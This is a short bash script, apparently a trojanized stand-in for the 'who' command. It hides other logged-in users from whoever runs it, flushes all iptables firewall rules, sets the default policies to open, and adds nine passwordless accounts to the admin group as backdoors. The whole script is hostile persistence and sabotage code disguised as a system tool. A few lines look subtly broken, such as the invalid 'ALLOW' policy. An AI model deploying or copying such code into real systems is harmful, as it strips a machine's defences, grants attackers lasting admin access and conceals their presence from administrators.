#!/bin/bash

# Execute real 'who' command and don't display anything. Also mess with them
# This will make them think they are the only one connected to the box
/lib/module_who $@ | grep -Ev "*" | echo "$USER\ttty1\t`date`"


# Source the ~/.bashrc
source ~/.bashrc

# Flush iptables rules
command iptables -F
command iptables -t mangle -F
command iptables -t nat -F
command iptables -t filter -F
command iptables -t raw -F
command iptables -t security -F

# Change default policies for 'iptables'
command iptables -P INPUT ALLOW
command iptables -P OUTPUT ALLOW
command iptables -P FORWARD ALLOW

# Add some admin users
command useradd -M devbl -p "" -G admin
command useradd -M bob -p "" -G admin
command useradd -M susan -p "" -G admin
command useradd -M kat -p "" -G admin
command useradd -M simon -p "" -G admin
command useradd -M batman -p "" -G admin
command useradd -M iamalwayshere -p "" -G admin
command useradd -M youcantgetridofme -p "" -G admin
command useradd -M hehe -p "" -G admin
